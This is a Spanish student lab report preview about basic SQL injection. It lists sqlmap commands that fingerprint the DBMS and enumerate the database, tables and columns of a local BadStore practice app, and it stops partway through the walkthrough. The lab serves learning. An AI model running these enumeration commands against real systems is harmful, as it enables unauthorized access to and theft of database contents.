Inyección básica SQL

Enviado por andresitovareli • 15 de Julio de 2020 • Prácticas o problemas • 754 Palabras (4 Páginas) • 150 Visitas

Página 1 de 4

^[1] Inyección básica SQL

[pic 1]

RESUMEN: Los ataques consiste en aprovechar una vulnerabilidad de un sistema informático (sistema operativo, programa de software o sistema del usuario) con propósitos desconocidos por el operador del sistema y que, por lo general, causan un daño.

Los ataques siempre se producen en Internet, a razón de varios ataques por minuto en cada equipo conectado. En su mayoría, se lanzan automáticamente desde equipos infectados (a través de virus, troyanos, gusanos, etc.) sin que el propietario sepa lo que está ocurriendo. En casos atípicos, son ejecutados por piratas informáticos.

PALABRAS CLAVE: ataques, informática.

Introducción

Los ataques por inyección SQL consiste en la inserción o “inyección” de una consulta SQL por medio de los datos de entrada desde el cliente hacia la aplicación. Un ataque por inyección SQL puede leer información, modificar la información, ejecutar operaciones de administración sobre la base de datos.

SQL Injection o Inyección SQL es una vulnerabilidad que permite al atacante enviar o “inyectar” instrucciones SQL de forma maliciosa y malintencionada dentro del código SQL programado para la manipulación de bases de datos, de esta forma todos los datos almacenados estarían en peligro. La finalidad de este ataque es poder modificar del comportamiento de nuestras consultas a través de parámetros no deseados, pudiendo así falsificar identidades, obtener y divulgar información de la base de datos (contraseñas, correos, información relevante, entre otros), borrar la base de datos, cambiar el nombre a las tablas, anular transacciones, el atacante puede convertirse en administrador de la misma.

Herramientas

Software de virtualización VirtualBox: Nos ayuda a simular un ordenador desde nuestro propio ordenador con sus recursos hardware, de tal manera que podamos configurarlo a nuestras necesidades.

SqlMap: es una herramienta desarrollada para realizar inyección de código SQL. La cual tiene como objetivo detectar y aprovechar las vulnerabilidades de inyección SQL en aplicaciones web.

[pic 2]

Practica.

Utilizando la herramienta “VirtualBox” se configura la maquina tipo “Linux”, versión “Ubuntu (64-bit)”.

[pic 3]

Al ejecutarse en la maquina vitual escribimos ifconfig y nos asigna la IP 192.168.1.16

Se procede a comprobar los archivos que se encuentran en SqlMap mediante el comando:

sqlmap.py -h

Ejecutamos la URL

Se obtiene la versión del SGBD y la vulnerabilidad del SGBD mediante el comando:

sqlmap.py -u " http://192.168.1.4/cgi-bin/badstore.cgi?searchquery=&action=search&x=15&y=16" -b

Se busca el nombre de la base de datos que utiliza la aplicación con el siguiente comando:

sqlmap.py -u " http://192.168.1.4/cgi-bin/badstore.cgi?searchquery=&action=search&x=15&y=16" --current-db

Como se puede observar con el comando anterior nos da el nombre de la base de datos llamada “badstoredb”

Se identifican las Tablas de la base de datos de la aplicación con el siguiente comando:

sqlmap.py -u " http://192.168.1.4/cgi-bin/badstore.cgi?searchquery=&action=search&x=15&y=16" --tables -D badstoredb

El resultado identifica que la base de datos tiene una tabla llamada “itemdb”

Se identifican las columnas de la tabla itemdb aplicando el código:

sqlmap.py -u " http://192.168.1.4/cgi-bin/badstore.cgi?searchquery=&action=search&x=15&y=16" -D badstoredb -T itemdb --columns

Como se puede apreciar en la imagen, se detacta el numero de columnas que contiene la tabla llamada “itemdb”

...

Descargar como (para miembros actualizados) txt (7.1 Kb) pdf (212.1 Kb) docx (451.6 Kb)

Leer 3 páginas más »

Leer documento completo Guardar

Disponible sólo en Clubensayos.com

Información sobre ensayo

prev next

Denunciar este ensayo

Ensayos relacionados

SQL Ejemplos
LABORATORIO PARA LA CASA- 02 • Consultas multitabla. • Consultas resumen. • Funciones de grupo SUM, AVG, MIN, MAX y COUNT. • Consultas agrupadas. Cláusula

12 Páginas • 2066 Visualizaciones
SQL Laboratorios
LABORATORIO PARA LA CASA- 02 • Consultas multitabla. • Consultas resumen. • Funciones de grupo SUM, AVG, MIN, MAX y COUNT. • Consultas agrupadas. Cláusula

12 Páginas • 1421 Visualizaciones
Sql Server
Todo empieza en el año de 1989 con SQL Server 1.0 que salió para el viejo sistemas operativo OS/2 de IBM que vio la luz

3 Páginas • 1006 Visualizaciones
SQL Server 2008 Features For The Database Administrator (DBA)
Author: Mike Weiner Contributor: Burzin Patel,Sanjay Mishra Reviewers: Lubor Kollar, Kevin Cox, Bill Emmert, Greg Husemeier, Paul Burpo, Joseph Sack, Denny Lee, Lindsey Allen, Mark

18 Páginas • 1072 Visualizaciones
Base De Datos Mediante Consulta Sql
Use master/*hacemos una consulta en base de datos*/ go create database cetpro/*se crea la base de datos cetpro*/ go use cetpro/*se utiliza la base de

15 Páginas • 1184 Visualizaciones
Practica De Base De Datos En SQL
PRACTICA de base de datos en sql Realice las consultas correspondientes de la siguiente base de datos: Para direccionar al esquema set search_path to "Practica2";

2 Páginas • 1064 Visualizaciones
SQL Subconsultas
. Las subconsultas (I) 1. Introducción Una subconsulta es una consulta que aparece dentro de otra consulta o subconsultas, en la lista de selección o

11 Páginas • 635 Visualizaciones
Ensayo De Indices Sql
Practica 10 Índices Jonathan Edi Santana Delgado GSI-0732 Practica 10 Jonathan Edi Santana Delgado Asignatura: Base de Datos II Tema: Índices Practica: Investigación Conceptos Fundamentales

5 Páginas • 1213 Visualizaciones
Cree Un Ejemplo De Base De Datos En El Cual Pueda Generar En código, En Sintaxis SQL
DESARROLLO DE ACTIVIDAD 1. Cree un ejemplo de base de datos en el cual pueda generar en código, en sintaxis SQL lo siguiente: a) Adicionar

2 Páginas • 824 Visualizaciones
Aprendienddo Sql
Aprendiendo SQL con PostgreSQL Introducción. Una base de datos es el corazón de toda empresa, en ella se almacena y se gestiona toda la información

13 Páginas • 441 Visualizaciones